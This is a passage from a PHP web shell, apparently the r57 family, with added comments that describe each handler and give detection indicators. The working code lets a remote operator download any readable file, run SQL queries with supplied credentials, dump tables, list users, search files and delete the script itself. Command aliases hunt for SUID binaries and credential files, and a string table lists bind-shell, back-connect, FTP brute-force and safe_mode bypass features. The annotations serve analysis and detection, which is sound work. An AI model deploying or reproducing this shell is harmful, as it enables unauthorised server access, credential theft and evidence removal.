  697       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
  698             $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
  699             }
  700     break;
  701     case 'Oracle':
  702       $this->dump[0] = '
  703 ### ORACLE dump';
  704       $this->dump[]  = '
  705 ### under construction';
  706     break;
  707     default:
  708      return 0;
  709     break;
  710     }
  711    return 1;
  712   }
  // Closes the connection for the selected backend; unknown backends are ignored.
  713  function close()
  714   {
  715    switch($this->db)
  716     {
  717           case 'MySQL':
  718            @mysql_close($this->connection);
  719     break;
  720     case 'MSSQL':
  721      @mssql_close($this->connection);
  722     break;
  723     case 'PostgreSQL':
  724      @pg_close($this->connection);
  725     break;
  726     case 'Oracle':
  727      @oci_close($this->connection);
  728     break;
  729     }
  730   }
  // Returns the driver's affected-row count for the last statement (0 for an
  // unknown backend). The driver function is handed $res, not $connection.
  731  function affected_rows()
  732   {
  733    switch($this->db)
  734     {
  735           case 'MySQL':
  736            return @mysql_affected_rows($this->res);
  737     break;
  738     case 'MSSQL':
  739      return @mssql_affected_rows($this->res);
  740     break;
  741     case 'PostgreSQL':
  742      return @pg_affected_rows($this->res);
  743     break;
  744     case 'Oracle':
  745      return @ocirowcount($this->res);
  746     break;
  747     default:
  748      return 0;
  749     break;
  750     }
  751   }
  752  }
  // Reviewer note (defensive): three request handlers that end the request early.
  //   ?img=N          serves one of two embedded GIF icons (base64 below).
  //   cmd=download_file (POST) reads the path in 'd_name' with fopen()/fread() and
  //                   returns it as an attachment, optionally compressed according
  //                   to the 'compress' field. No path restriction is applied, so
  //                   any file readable by the web-server user can be retrieved.
  //                   On open failure re() - defined outside this excerpt - is echoed.
  //   ?phpinfo        prints phpinfo() followed by a BACK link.
  // Detection: POST bodies with cmd=download_file and a d_name path; attachment
  // responses from a script that normally serves HTML; query strings 'img',
  // 'phpinfo' on an unexpected .php file.
  753 if(isset($_GET['img'])&&!empty($_GET['img']))
  754  {
  755  $images = array();
  756  $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw==';
  757  $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw==';
  758  @ob_clean();
  759  header("Content-type: image/gif");
  760  echo base64_decode($images[$_GET['img']]);
  761  die();
  762  }
  763 if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
  764  {
  765   if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; }
  766   else
  767    {
  768     @ob_clean();
  // basename() keeps only the last path component for the download name.
  769     $filename = @basename($_POST['d_name']);
  770     $filedump = @fread($file,@filesize($_POST['d_name']));
  771     fclose($file);
  772     $content_encoding=$mime_type='';
  // compress() rewrites $filename/$filedump in place and sets the two globals.
  773     compress($filename,$filedump,$_POST['compress']);
  774     if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
  775     header("Content-type: ".$mime_type);
  776     header("Content-disposition: attachment; filename=\"".$filename."\";");
  777     echo $filedump;
  778     exit();
  779    }
  780  }
  781 if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  // Reviewer note (defensive): SQL console. When the POST field cmd is "db_query",
  // a my_sql client is configured entirely from request fields (db, db_server,
  // db_port, mysql_l, mysql_p, mysql_db), the text in 'db_query' is split on ';'
  // and every piece longer than five characters is executed in turn.
  // Result cells and column names are HTML-escaped before display; the submitted
  // query text is put back into the textarea unescaped.
  // The form is re-rendered with all connection fields, including the password,
  // as hidden inputs, so the credentials travel in every request and response
  // body. in() is defined outside this excerpt.
  // Detection: POST bodies containing cmd=db_query together with mysql_l / mysql_p;
  // the literal default text "SHOW DATABASES;" / "SELECT * FROM user;" in traffic;
  // database connections from the web host using accounts the application does not own.
  782 if ($_POST['cmd']=="db_query")
  783  {
  784  echo $head;
  785  $sql = new my_sql();
  786  $sql->db   = $_POST['db'];
  787  $sql->host = $_POST['db_server'];
  788  $sql->port = $_POST['db_port'];
  789  $sql->user = $_POST['mysql_l'];
  790  $sql->pass = $_POST['mysql_p'];
  791  $sql->base = $_POST['mysql_db'];
  792  $querys = @explode(';',$_POST['db_query']);
  793  if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
  794   else
  795    {
  796    if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
  797    else
  798     {
  799     foreach($querys as $num=>$query)
  800      {
  801       if(strlen($query)>5)
  802       {
  803       echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
  // query() returns 0 (error), 1 (rows to show) or 2 (no result set); the case
  // labels are strings and match through loose comparison.
  804       switch($sql->query($query))
  805        {
  806        case '0':
  807        echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
  808        break;
  809        case '1':
  810        if($sql->get_result())
  811         {
  812                echo "<table width=100%>";
  813         foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
  814                $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns);
  815         echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
  816         for($i=0;$i<$sql->num_rows;$i++)
  817          {
  818          foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
  819          $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);
  820          echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
  821          }
  822         echo "</table>";
  823         }
  824        break;
  825        case '2':
  826        $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
  827        echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
  828        break;
  829        }
  830       }
  831      }
  832     }
  833    }
  834  echo "<br><form name=form method=POST>";
  835  echo in('hidden','db',0,$_POST['db']);
  836  echo in('hidden','db_server',0,$_POST['db_server']);
  837  echo in('hidden','db_port',0,$_POST['db_port']);
  838  echo in('hidden','mysql_l',0,$_POST['mysql_l']);
  839  echo in('hidden','mysql_p',0,$_POST['mysql_p']);
  840  echo in('hidden','mysql_db',0,$_POST['mysql_db']);
  841  echo in('hidden','cmd',0,'db_query');
  842  echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
  843  echo "</form>";
  844  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
  845  }
  // Reviewer note (defensive): clean-up handlers.
  //   ?delete  unlinks the file whose name is the last path segment of PHP_SELF,
  //            resolved against the current working directory - in practice the
  //            script removing itself. For responders this means the file may be
  //            gone by the time the host is examined; web access logs and backups
  //            become the primary evidence.
  //   ?tmp     removes a fixed list of files under /tmp. They are not created in
  //            this excerpt - presumably they are helper binaries and sources
  //            dropped by other parts of the shell; confirm against the full file.
  // Detection: the seven /tmp paths below are host indicators (file creation,
  // execution or deletion by the web-server user); 'delete' or 'tmp' query
  // strings on an unexpected .php file are log indicators.
  846 if(isset($_GET['delete']))
  847  {
  848    @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
  849  }
  850 if(isset($_GET['tmp']))
  851  {
  852    @unlink("/tmp/bdpl");
  853    @unlink("/tmp/back");
  854    @unlink("/tmp/bd");
  855    @unlink("/tmp/bd.c");
  856    @unlink("/tmp/dp");
  857    @unlink("/tmp/dpc");
  858    @unlink("/tmp/dpc.c");
  859  }
  // Reviewer note (defensive): ?phpini prints every PHP configuration directive
  // with its local and master value as an HTML table, then ends the request.
  // This is host reconnaissance: the output shows which restrictions are active
  // on the server. ws() is defined outside this excerpt.
  860 if(isset($_GET['phpini']))
  861 {
  862 echo $head;
  // Renders one ini value for display: empty -> "no value", booleans as
  // TRUE/FALSE, null as NULL, arrays/objects via print_r(); the result is
  // HTML-escaped and wrapped by U_wordwrap().
  863 function U_value($value)
  864  {
  865  if ($value == '') return '<i>no value</i>';
  866  if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
  867  if ($value === null) return 'NULL';
  868  if (@is_object($value)) $value = (array) $value;
  869  if (@is_array($value))
  870  {
  871  @ob_start();
  872  print_r($value);
  873  $value = @ob_get_contents();
  874  @ob_end_clean();
  875  }
  876  return U_wordwrap((string) $value);
  877  }
  // HTML-escapes $str and inserts <wbr /> every 100 characters; the regex then
  // moves any <wbr /> that landed inside an HTML entity to just after it.
  878 function U_wordwrap($str)
  879  {
  880  $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
  881  return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
  882  }
  883 if (@function_exists('ini_get_all'))
  884  {
  885  $r = '';
  886  echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
  887  foreach (@ini_get_all() as $key=>$value)
  888   {
  889   $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
  890   }
  891  echo $r;
  892  echo '</table>';
  893  }
  894 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  895 die();
  896 }
// CPU info page: a `cpu` query parameter renders the lines of a file named "cpuinfo" as a
// two-column table (text before ":" / text after ":") and ends the request with die().
// The path is relative, so it is resolved against the current working directory; no
// chdir to /proc is visible before this point -- TODO confirm where (or whether) that happens.
// NOTE(review): $r is appended to without being initialised in this branch, and a line
// without ":" leaves $info[1] undefined when it is compared.
if(isset($_GET['cpu']))
 {
   echo $head;
   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
   $cpuf = @file("cpuinfo");
   if($cpuf)
    {
      $c = @sizeof($cpuf);
      for($i=0;$i<$c;$i++)
        {
          $info = @explode(":",$cpuf[$i]);
          // Empty right-hand side is shown as a placeholder.
          if($info[1]==""){ $info[1]="---"; }
          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
        }
      echo $r;
    }
   else
    {
      // File missing or unreadable: a single placeholder row.
      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
    }
   echo '</table>';
   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
   die();
 }
// Memory info page: a `mem` query parameter renders the lines of a file named "meminfo" as
// a two-column table (text before ":" / text after ":") and ends the request with die().
// As with the cpu handler, the path is relative to the current working directory; no
// chdir to /proc is visible before this point -- TODO confirm.
// NOTE(review): $r is appended to without being initialised in this branch, and a line
// without ":" leaves $info[1] undefined when it is compared.
if(isset($_GET['mem']))
 {
   echo $head;
   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
   $memf = @file("meminfo");
   if($memf)
    {
      $c = sizeof($memf);
      for($i=0;$i<$c;$i++)
        {
          $info = explode(":",$memf[$i]);
          // Empty right-hand side is shown as a placeholder.
          if($info[1]==""){ $info[1]="---"; }
          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
        }
      echo $r;
    }
   else
    {
      // File missing or unreadable: a single placeholder row.
      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
    }
   echo '</table>';
   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
   die();
 }
// UI string table. Keys are "<language>_<id>"; the handlers in this file look labels up as
// $lang[$language.'_textNN'].
// The 'ru_' values appear as runs of "?" in this listing, presumably because the original
// Cyrillic encoding was lost when the page was captured; they are kept exactly as found.
// For analysts, the 'eng_' half doubles as a feature inventory of the shell (command
// execution, bind and back-connect, datapipe, file upload/download/edit, SQL client and
// table dump, FTP brute force, mail sending, safe_mode / open_basedir bypass tests), and
// the literal labels are stable strings for static signatures.
$lang=array(
'ru_text1' =>'??????????? ???????',
'ru_text2' =>'?????????? ?????? ?? ???????',
'ru_text3' =>'????????? ???????',
'ru_text4' =>'??????? ??????????',
'ru_text5' =>'???????? ?????? ?? ??????',
'ru_text6' =>'????????? ????',
'ru_text7' =>'??????',
'ru_text8' =>'???????? ?????',
'ru_butt1' =>'?????????',
'ru_butt2' =>'?????????',
'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
'ru_text10'=>'??????? ????',
'ru_text11'=>'?????? ??? ???????',
'ru_butt3' =>'???????',
'ru_text12'=>'back-connect',
'ru_text13'=>'IP-?????',
'ru_text14'=>'????',
'ru_butt4' =>'?????????',
'ru_text15'=>'???????? ?????? ? ?????????? ???????',
'ru_text16'=>'????????????',
'ru_text17'=>'????????? ????',
'ru_text18'=>'????????? ????',
'ru_text19'=>'Exploits',
'ru_text20'=>'????????????',
'ru_text21'=>'????? ???',
'ru_text22'=>'datapipe',
'ru_text23'=>'????????? ????',
'ru_text24'=>'????????? ????',
'ru_text25'=>'????????? ????',
'ru_text26'=>'????????????',
'ru_butt5' =>'?????????',
'ru_text28'=>'?????? ? safe_mode',
'ru_text29'=>'?????? ????????',
'ru_butt6' =>'???????',
'ru_text30'=>'???????? ?????',
'ru_butt7' =>'???????',
'ru_text31'=>'???? ?? ??????',
'ru_text32'=>'?????????? PHP ????',
'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
'ru_butt8' =>'?????????',
'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
'ru_text36'=>'???? . ???????',
'ru_text37'=>'?????',
'ru_text38'=>'??????',
'ru_text39'=>'????',
'ru_text40'=>'???? ??????? ???? ??????',
'ru_butt9' =>'????',
'ru_text41'=>'????????? ? ?????',
'ru_text42'=>'?????????????? ?????',
'ru_text43'=>'????????????? ????',
'ru_butt10'=>'?????????',
'ru_butt11'=>'?????????????',
'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
'ru_text45'=>'???? ????????',
'ru_text46'=>'???????? phpinfo()',
'ru_text47'=>'???????? ???????? php.ini',
'ru_text48'=>'???????? ????????? ??????',
'ru_text49'=>'???????? ??????? ? ???????',
'ru_text50'=>'?????????? ? ??????????',
'ru_text51'=>'?????????? ? ??????',
'ru_text52'=>'????? ??? ??????',
'ru_text53'=>'?????? ? ?????',
'ru_text54'=>'????? ?????? ? ??????',
'ru_butt12'=>'?????',
'ru_text55'=>'?????? ? ??????',
'ru_text56'=>'?????? ?? ???????',
'ru_text57'=>'???????/??????? ????/??????????',
'ru_text58'=>'???',
'ru_text59'=>'????',
'ru_text60'=>'??????????',
'ru_butt13'=>'???????/???????',
'ru_text61'=>'???? ??????',
'ru_text62'=>'?????????? ???????',
'ru_text63'=>'???? ??????',
'ru_text64'=>'?????????? ???????',
'ru_text65'=>'???????',
'ru_text66'=>'???????',
'ru_text67'=>'Chown/Chgrp/Chmod',
'ru_text68'=>'???????',
'ru_text69'=>'????????1',
'ru_text70'=>'????????2',
'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
'ru_text72'=>'????? ??? ??????',
'ru_text73'=>'?????? ? ?????',
'ru_text74'=>'?????? ? ??????',
'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
'ru_text80'=>'???',
'ru_text81'=>'????',
'ru_text82'=>'???? ??????',
'ru_text83'=>'?????????? SQL ???????',
'ru_text84'=>'SQL ??????',
'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
'ru_text86'=>'?????????? ????? ? ???????',
'ru_butt14'=>'???????',
'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
'ru_text88'=>'FTP-??????:????',
'ru_text89'=>'???? ?? ftp ???????',
'ru_text90'=>'????? ????????',
'ru_text91'=>'???????????? ?',
'ru_text92'=>'??? ?????????',
'ru_text93'=>'FTP',
'ru_text94'=>'FTP-????????',
'ru_text95'=>'?????? ?????????????',
'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
'ru_text97'=>'????????? ??????????: ',
'ru_text98'=>'??????? ???????????: ',
'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
'ru_text102'=>'?????',
'ru_text103'=>'???????? ??????',
'ru_text104'=>'???????? ????? ?? ???????? ????',
'ru_text105'=>'????',
'ru_text106'=>'??',
'ru_text107'=>'????',
'ru_butt15'=>'?????????',
'ru_text108'=>'????? ??????',
'ru_text109'=>'????????',
'ru_text110'=>'??????????',
'ru_text111'=>'SQL-?????? : ????',
'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail',
'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list',
'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body',
/* --------------------------------------------------------------- */
'eng_text1' =>'Executed command',
'eng_text2' =>'Execute command on server',
'eng_text3' =>'Run command',
'eng_text4' =>'Work directory',
'eng_text5' =>'Upload files on server',
'eng_text6' =>'Local file',
'eng_text7' =>'Aliases',
'eng_text8' =>'Select alias',
'eng_butt1' =>'Execute',
'eng_butt2' =>'Upload',
'eng_text9' =>'Bind port to /bin/bash',
'eng_text10'=>'Port',
'eng_text11'=>'Password for access',
'eng_butt3' =>'Bind',
'eng_text12'=>'back-connect',
'eng_text13'=>'IP',
'eng_text14'=>'Port',
'eng_butt4' =>'Connect',
'eng_text15'=>'Upload files from remote server',
'eng_text16'=>'With',
'eng_text17'=>'Remote file',
'eng_text18'=>'Local file',
'eng_text19'=>'Exploits',
'eng_text20'=>'Use',
'eng_text21'=>'&nbsp;New name',
'eng_text22'=>'datapipe',
'eng_text23'=>'Local port',
'eng_text24'=>'Remote host',
'eng_text25'=>'Remote port',
'eng_text26'=>'Use',
'eng_butt5' =>'Run',
'eng_text28'=>'Work in safe_mode',
'eng_text29'=>'ACCESS DENIED',
'eng_butt6' =>'Change',
'eng_text30'=>'Cat file',
'eng_butt7' =>'Show',
'eng_text31'=>'File not found',
'eng_text32'=>'Eval PHP code',
'eng_text33'=>'Test bypass open_basedir with cURL functions',
'eng_butt8' =>'Test',
'eng_text34'=>'Test bypass safe_mode with include function',
'eng_text35'=>'Test bypass safe_mode with load file in mysql',
'eng_text36'=>'Database . Table',
'eng_text37'=>'Login',
'eng_text38'=>'Password',
'eng_text39'=>'Database',
'eng_text40'=>'Dump database table',
'eng_butt9' =>'Dump',
'eng_text41'=>'Save dump in file',
'eng_text42'=>'Edit files',
'eng_text43'=>'File for edit',
'eng_butt10'=>'Save',
'eng_text44'=>'Can\'t edit file! Only read access!',
'eng_text45'=>'File saved',
'eng_text46'=>'Show phpinfo()',
'eng_text47'=>'Show variables from php.ini',
'eng_text48'=>'Delete temp files',
'eng_butt11'=>'Edit file',
'eng_text49'=>'Delete script from server',
'eng_text50'=>'View cpu info',
'eng_text51'=>'View memory info',
'eng_text52'=>'Find text',
'eng_text53'=>'In dirs',
'eng_text54'=>'Find text in files',
'eng_butt12'=>'Find',
'eng_text55'=>'Only in files',
'eng_text56'=>'Nothing :(',
'eng_text57'=>'Create/Delete File/Dir',
'eng_text58'=>'name',
'eng_text59'=>'file',
'eng_text60'=>'dir',
'eng_butt13'=>'Create/Delete',
'eng_text61'=>'File created',
'eng_text62'=>'Dir created',
'eng_text63'=>'File deleted',
'eng_text64'=>'Dir deleted',
'eng_text65'=>'Create',
'eng_text66'=>'Delete',
'eng_text67'=>'Chown/Chgrp/Chmod',
'eng_text68'=>'Command',
'eng_text69'=>'param1',
'eng_text70'=>'param2',
'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
'eng_text72'=>'Text for find',
'eng_text73'=>'Find in folder',
'eng_text74'=>'Find in files',
'eng_text75'=>'* you can use regexp',
'eng_text76'=>'Search text in files via find',
'eng_text80'=>'Type',
'eng_text81'=>'Net',
'eng_text82'=>'Databases',
'eng_text83'=>'Run SQL query',
'eng_text84'=>'SQL query',
'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
'eng_text86'=>'Download files from server',
'eng_butt14'=>'Download',
'eng_text87'=>'Download files from remote ftp-server',
'eng_text88'=>'FTP-server:port',
'eng_text89'=>'File on ftp',
'eng_text90'=>'Transfer mode',
'eng_text91'=>'Archivation',
'eng_text92'=>'without archivation',
'eng_text93'=>'FTP',
'eng_text94'=>'FTP-bruteforce',
'eng_text95'=>'Users list',
'eng_text96'=>'Can\'t get users list',
'eng_text97'=>'checked: ',
'eng_text98'=>'success: ',
'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
'eng_text100'=>'Send file to remote ftp server',
'eng_text101'=>'Use reverse (user -> resu) login for password',
'eng_text102'=>'Mail',
'eng_text103'=>'Send email',
'eng_text104'=>'Send file to email',
'eng_text105'=>'To',
'eng_text106'=>'From',
'eng_text107'=>'Subj',
'eng_butt15'=>'Send',
'eng_text108'=>'Mail',
'eng_text109'=>'Hide',
'eng_text110'=>'Show',
'eng_text111'=>'SQL-Server : Port',
'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
'eng_text777'=>'bypass safemode with copy()',
'eng_text888'=>'File name',
'eng_text7777'=>'bypass safemode with curl()',
'eng_text8888'=>'File name',
'eng_text999'=>'bypass safemode with imap()',
'eng_text9999'=>'File name',
'eng_text1010'=>'bypass safemode with id()',
'eng_text101010'=>'',
);
1206 /*
1207 ?????? ??????
1208 ????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
1209 ?? ?????? ???? ????????? ??? ???????? ???????.
1210 */
// Canned shell commands, keyed by the label shown to the operator. The code that renders
// and runs them is outside this part of the listing.
// Read defensively, the list maps what the operator looks for after landing on a host:
// SUID/SGID binaries, world-writable files and directories, application config files,
// credential stores (.htpasswd, service.pwd, .fetchmailrc), shell and MySQL history files,
// extended file attributes, and listening ports.
// A web-server account spawning `find /` with -perm -04000 / -02000 / -2, or searching for
// these file names, is a strong process-telemetry signal.
// The last entry uses a row of dashes as its label and maps to `ls -la`; presumably it
// doubles as a visual separator in the selection list.
$aliases=array(
'find suid files'=>'find / -type f -perm -04000 -ls',
'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
'find config.inc.php files'=>'find / -type f -name config.inc.php',
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
'find config* files'=>'find / -type f -name "config*"',
'find config* files in current dir'=>'find . -type f -name "config*"',
'find all writable files'=>'find / -type f -perm -2 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories'=>'find /  -type d -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files'=>'find / -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'find all service.pwd files'=>'find / -type f -name service.pwd',
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
'find all .htpasswd files'=>'find / -type f -name .htpasswd',
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
'find all .bash_history files'=>'find / -type f -name .bash_history',
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
'find all .mysql_history files'=>'find / -type f -name .mysql_history',
'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
'list file attributes on a Linux second extended file system'=>'lsattr -va',
'show opened ports'=>'netstat -an | grep -i listen',
'----------------------------------------------------------------------------------------------------'=>'ls -la'
);
// Reusable HTML fragments for the panel layout: section header open/close, table wrappers,
// bracket and arrow decorations, the default font tag, and the POST form open/close tags.
// The code that concatenates them is outside this part of the listing.
$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
$table_up2  = " ::</div></b></font></td></tr><tr><td>";
$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
$table_end1 = "</td></tr>";
// The "?" inside the Wingdings tag is as found in the listing; the original glyph was
// presumably lost in the same way as the Cyrillic strings.
$arrow = " <font face=Wingdings color=gray>?</font>";
$lb = "<font color=black>[</font>";
$rb = "<font color=black>]</font>";
$font = "<font face=Verdana size=-2>";
$ts = "<table class=table1 width=100% align=center>";
$te = "</table>";
$fs = "<form name=form method=POST>";
$fe = "</form>";
// Account listing page: a `users` query parameter prints the names returned by get_users()
// (the first field of each /etc/passwd line), one per line, then ends the request.
// When get_users() returns a falsy value the localized "can't get users list" message
// ($lang[..'_text96']) is shown instead. $language is set outside this part of the listing.
// Reads of /etc/passwd by the web-server account are routine on their own, so this page
// is better detected through the request parameter than through file-access telemetry.
if(isset($_GET['users']))
 {
 if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
 else
  {
  echo '<center>';
  // Names are echoed as read from the file, without HTML escaping.
  foreach($users as $user) { echo $user."<br>"; }
  echo '</center>';
  }
 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
 }
// Working-directory and platform detection.
// The POSTed `dir` value is passed to chdir() as-is, so the requester chooses the directory
// every later relative path is resolved against.
if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
$dir = @getcwd();
$windows = 0;
$unix = 0;
// A drive-letter style path ("X:...") marks Windows; everything else, including an empty
// getcwd() result, is provisionally marked Unix.
if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
// Fallback when getcwd() returned nothing: consult the OS environment variable, then
// php_uname().
// NOTE(review): $unix was already set to 1 on the line above in this case, so a "win"
// match here leaves both flags set.
// NOTE(review): eregi() was removed in PHP 7.0; on newer runtimes this branch is a fatal
// error that the @ operator does not suppress.
if(empty($dir))
 {
 $os = getenv('OS');
 if(empty($os)){ $os = php_uname(); }
 if(empty($os)){ $os ="-"; $unix=1; }
 else
    {
    if(@eregi("^win",$os)) { $windows = 1; }
    else { $unix = 1; }
    }
 }
// Text-search page: runs when POST carries s_dir, s_text and cmd=search_text.
// It builds a SearchResult over the requested directories, runs the search, prints each
// matching file with its matching lines, and ends the request with die().
// The file mask (s_mask) is applied only when the `m` field is also set.
// Because the search walks whole directory trees and opens every file it finds, a burst of
// reads across the web root by the PHP process is the observable side effect.
if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
  {
    echo $head;
    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
    // Both arguments are 0: no whole-word wrapping, case-insensitive matching.
    $sr->SearchText(0,0);
    $res = $sr->GetResultFiles();
    $found = $sr->GetMatchesCount();
    $titles = $sr->GetTitles();
    $r = "";
    if($found > 0)
    {
      $r .= "<TABLE width=100%>";
      // $res maps file name => (line number => highlighted line).
      foreach($res as $file=>$v)
      {
        $r .= "<TR>";
        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
